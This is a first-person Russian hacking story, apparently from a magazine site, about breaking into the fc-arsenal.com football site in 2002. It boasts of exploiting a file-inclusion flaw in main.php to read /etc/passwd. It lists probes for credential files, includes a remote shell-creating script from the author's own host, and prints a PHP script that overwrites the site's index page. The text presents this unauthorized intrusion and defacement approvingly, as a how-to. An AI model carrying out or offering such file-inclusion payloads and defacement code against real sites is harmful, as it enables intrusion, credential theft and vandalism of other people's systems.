Все началось 21.12.2002 с того, что какой-то чел написал в гостевой книге на моём сайте чтобы я попробовал взломать www.fc-arsenal.com. В этот вечер делать было нечего,
скукотища полная, ну думаю попробую, да и не фанат я Арсенала 😉 

Зашел на сайт, поглядел чего там и как. Решил для начала посмотреть наличие форумов. Но их там не оказалось! Гостевая книга и чат вроде тоже без багов. И тогда я наткнулся на скрипт новостей. Открыл его в новом окне, путь был таким — http://www.fc-arsenal.com/new/main.php?news/news.php. Вот это строка — main.php?news/news.php — меня удивила! Не ужели это то, о чем я думаю? Не может быть! На таком сайте, такая дыра…
Да, действительно, скрипт вставляет в правый фрейм файл, указанный в параметрах его запуска.

Я попробовал main.php?/etc/passwd и передо мной отобразился /etc/passwd. Естественно, что ничего хорошего я там не обнаружил. Тогда я попробовал main.php?/etc/shadow и main.php?/etc/master.passwd, но паролей я не получил, прав на чтение таких файлов не хватает. После этого я попробовал найти какие-нибудь файлы, в которых могут хранится пароли или какая-нибудь полезная информация, например логин и пароль от MySQL.

main.php?../_vti_pvt/service.pwd
main.php?../.htaccess
main.php?../.htpasswd
main.php?../../.htpasswd
main.php?../config.php
main.php?config.inc
main.php?config.php

Но успехом эти запросы не увенчались, никаких паролей я не получил. Попробовал найти и получить админку гостевой книги, но её там
по моему вообще нет! 🙂 Новости на сайт скорее всего добавляются автоматически через какой-то скрипт, и возможно требуется авторизация для доступа к нему. Но опять же ничего полезного я не нашел :(. 

И тогда я решил попробовать указать ссылку на мой PHP скрипт. main.php?http://overgsite.net/createshell.php. Получилось! Этот скрипт создал мне Httpd Shell на сервере, ввёл команду id — мои права — arsenal :). Теперь я мог видеть все файлы, выполнять любые команды и делать вообще все, что угодно! Полазив по файлам ничего хорошего я не нашел. Думаю ладно, надо дефейсить, я мог бы дефейснуть командой echo… Но тогда дефейс был бы plain-text’ом, а это не красиво!
Я написал простенький скрипт для дефейса который открывал index.html и записывал туда «текст дефейса».

Вот этот скрипт (deface.php):

$opnfile=fopen("../index.html","w");
fwrite($opnfile,"<html><BODY bgColor=#000000><title>DWC Gr0up own U :)</title><center><br><
img src=http://overgsite.net/defacez/deface_2.gif>
<font color=white>Болейте за российский футбол!
</center></html>»);
fclose($opnfile);

Стоило мне только выполнить main.php?http://overgsite.net/deface.php и все! Сайт задефейсен!

P.S. Болейте за российский футбол 😉

Зеркало

Оставить мнение

Check Also

Скрытая сила пробела. Эксплуатируем критическую уязвимость в Apache Tomcat

В этой статье мы поговорим о баге в Apache Tomcat, популярнейшем веб-сервере для сайтов на…